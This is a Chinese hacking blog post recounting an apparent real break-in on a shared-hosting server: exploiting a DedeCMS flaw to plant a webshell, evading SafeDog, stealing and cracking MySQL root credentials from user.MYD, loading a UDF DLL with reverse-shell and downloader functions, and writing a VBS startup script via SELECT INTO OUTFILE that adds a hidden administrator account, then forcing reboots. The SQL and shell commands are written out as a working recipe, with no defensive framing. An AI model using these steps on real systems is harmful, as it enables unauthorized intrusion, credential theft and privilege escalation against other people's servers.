mysql提权入侵服务器_Mysql提权拿服务器

最新dedecms出了漏洞。

很常规就找几个站日日。dedecms为主流了

有这么些常规的Oday日起站来容易。

很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。

b42e5642c02366af4bcb4da138af26dd.png

接着看着虚拟主机。好久没提过虚拟主机的。以前都是权限大的才提。这次提着试试。权限很小。

一般mysql提权我先是看站是不是mysql的。然后找配置文件看下。看连接数据库能有mysql的权限不。

dedecms一般都在data目录下的这个文件记录数据库信息。

7e578dd803251473b8cda9c747494a81.png

然后菜刀配置连接

b1b1c1d8fa20dfb1af20a90d408339fc.png

这次没有那么运气。当然。在虚拟主机我以前遇见过一次。八十多个站的。zkeys的虚拟主机。

不行。

就不上尝试mysql提权了。

接着先上asp大马

7d3f56390df29e36af938cd99fd4b0ab.png

。很常规的去看组件和脚本。

c260e561f039feb73b214048df2714f3.png

不支持aspx。

好吧。一场恶战。

接着就是看组件了

0131c16dd2352fe051dfc39f3afa5bab.png

尼玛啊。四个都禁用了。禁用你妹啊。

接着大马翻目录啊。

找可以利用的吧。

由于权限小。没什么可以翻的。

就找到了一个c:\program files\的目录。不可写。但是可以读。所有子目录都可以。

6b45d389bb953471ffa668b3a547de5d.png

不过里面都翻了。还是没什么。

不可写。lpk也不行。

接着就继续。

d7eb565a94822937185ad443a5e50938.png

发现这个。尼玛啊。天地良心。看到了mysql。果断点击进去

e2aa3898bb7c1c4a8ffcd90bb994dbe8.png

把文件下载本地。

然后是不可以用txt什么的编辑的。

我就用下好压。接着用里面自带的内部查看器。看到了路径

PS: 其实用普通的mysql账号连接数据库后执行 show variables like '%datadir%'; 就可以看到数据库路径

fd4a4036b40ab3ce807467b44c3e3b34.png

好了。不喜欢用大马提权。转战菜刀

55694769149a0282fca21e3de440c169.png

心突然一灰。

接着docs

072409fdac82dde6e81b8f606ff1592f.png

我操可以访问。不是继承性的目录权限。

接着果断mysql\data\

8c8cccab48948349f48dd31f0fee65a4.png

卧槽。亮瞎了我的钛合金狗眼。你看这是神马?

还有mysql的目录权限啊。

果断下载user.myd

f1460752f36947883e66cff77f35f584.png

尼玛四十位的有木有啊。现在这样子懒得我去组合了啊啊啊啊。狗屎运啊。

上cmd5解密

21bf32e15f89879cdaad115ea0d1214d.png

菜刀配置去鸟。

a9766a9905771712008c3fcc45712302.png

温馨感有木有。

看版本咯

select version();

222405a071505fe53329b8957bec4594.png

5.0啊有木有。不需要导安装目录了。

上udf导出创建函数

061edb5a20bc26dd62e405b1330e9ecb.png

~~~~~~~~~~~~~~~~~~~~~北极大黑阔的分界线~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

downloader 下载者,到网上下载指定文件并保存到指定目录;

open3389 通用开3389终端服务,可指定端口(不改端口无需重启);

backshell 反弹Shell;

ProcessView 枚举系统进程;

KillProcess 终止指定进程;

regread 读注册表;

regwrite 写注册表;

shut 关机,注销,重启;

about 说明与帮助函数;

~~~~~~~~~~~~~~~~~~~~~北极大黑阔的分界线~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cmdshell创建了。很高兴。

可是。尼玛

b37eec23e4aededf05da0d83a8139881.png

什么情况??之前遇到一个5.5也发生了。卧槽。。

不过可以创建函数。我就写入启动项提权了

3289160e7b21a7c2f0ca7d7779ecc21e.png

创建过程不截图了。

连接mysql数据库后执行

create table a (cmd text);

创建a表列名cmd并写入文本

insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " );

这是接下来一个一个执行的

建立好列并写入数据了。接着就是导出了。

C:\Documents and Settings\All Users\「开始」菜单\程序\启动\这个是启动目录。

接着select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs"跟着别的大黑阔的。

在菜刀不可以这样子执行。而我是在udf.php里面执行的

然后udf创建shut函数

执行。

create function shut returns string soname 'udf.dll'

f1569cc24dd4d5a4079bb86a1561bc89.png

创建了。

接下来关机

select shut ("shutdown")

等管理开机就建立账号了。

接着一个中午过去了。

尼玛。看不了端口。用工具一扫端口就封IP。asp大马没权限读。不能执行命令根本看不鸟。aspx不支持。尼玛要是支持直接读注册表。

接着纠结一会。想到了。

49dd2e5d75e58bb7df45304ba5ac0017.png

用mysql写入文件到启动项。

netstat -ano 显示所有开放端口 > 导出到c:\windows\temp\fuck.txt文本。

接着继续select shut ("shutdown")

我又关机了。接着等到刚才。

重新上shell

e2aa3898bb7c1c4a8ffcd90bb994dbe8.png

接着打开

8087574ab74be443623a3d18990b5e43.png

接着

438a7069497bcffd32f76a4ccbd375c0.png

V3eY4原创.QQ:649120659.转载请注明出处。

尼玛文章不容易啊。就这么过了一个小时?

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值